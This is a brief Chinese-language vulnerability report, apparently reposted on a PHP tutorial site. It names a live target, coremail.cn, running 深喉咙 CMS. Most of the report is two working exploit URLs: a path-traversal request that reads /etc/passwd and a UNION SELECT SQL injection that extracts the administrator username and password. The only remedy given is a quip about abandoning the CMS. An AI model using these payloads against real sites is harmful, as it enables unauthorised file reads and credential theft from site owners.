来源:自学PHP网 时间:2015-04-17 13:02 作者: 阅读:次
[导读] 目标:http://www.coremail.cn/程序:深喉咙CMS存在SQL注入,任意文件读取漏洞,可能有人早发现了,没人发我就来发一下。详细说明:http://www.coremail.cn/?p=1m=/../../../../../../../../../etc/passwd读取...
目标:http://www.coremail.cn/
程序:深喉咙CMS 存在SQL注入,任意文件读取漏洞,可能有人早发现了,没人发我就来发一下。 详细说明: http://www.coremail.cn/?p=1&m=/../../../../../../../../../etc/passwd 读取服务器/etc/passwd文件 http://www.coremail.cn/?p=24&m=search&keyword=aaa%2527%20union%20select%201,2,3,4,username,6,7,pwd,9,10,11,12,13%20from%20shl_user%23 得到管理员用户名和密码 漏洞证明: 修复方案: 放弃深喉咙吧,那么多好的CMS是吧。 作者:rootsecurity |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com